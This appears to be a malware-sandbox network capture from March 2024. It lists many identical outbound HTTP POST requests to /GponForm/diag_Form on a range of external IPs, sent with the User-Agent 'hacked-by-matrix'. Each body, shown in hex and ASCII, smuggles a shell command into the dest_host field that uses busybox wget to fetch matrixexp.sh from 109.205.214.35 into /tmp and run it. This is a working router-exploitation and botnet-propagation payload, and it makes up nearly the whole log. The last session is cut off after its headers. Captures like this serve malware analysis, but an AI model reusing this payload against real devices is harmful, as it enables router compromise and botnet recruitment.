                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1425192.168.2.1333614212.72.237.242443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741765022 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1426192.168.2.133367242.34.176.220443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741789103 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1427192.168.2.1339858118.208.163.69443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741796017 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1428192.168.2.1357534118.14.22.64443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741868019 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1429192.168.2.134863642.163.76.8443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741873026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1430192.168.2.1352600109.166.77.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749377966 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1431192.168.2.1347984212.63.21.245443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749391079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1432192.168.2.133688842.157.81.74443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749399900 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1433192.168.2.135405442.40.92.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749413967 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1434192.168.2.1353514118.18.127.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749413967 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1435192.168.2.1343866118.52.155.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749422073 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1436192.168.2.13336885.249.102.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749434948 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1437192.168.2.1340164212.176.147.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749450922 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1438192.168.2.13603685.218.246.36443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749456882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1439192.168.2.1334052118.190.122.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749463081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1440192.168.2.1357204212.153.35.12443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749486923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1441192.168.2.1338088109.94.164.152443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749496937 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1442192.168.2.1333838212.208.26.255443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749505997 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1443192.168.2.134198042.162.82.47443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749566078 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1444192.168.2.1357124212.79.126.234443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749577045 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1445192.168.2.1351986118.98.140.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749600887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1446192.168.2.13448185.44.25.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749602079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1447192.168.2.13584005.102.225.187443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749602079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
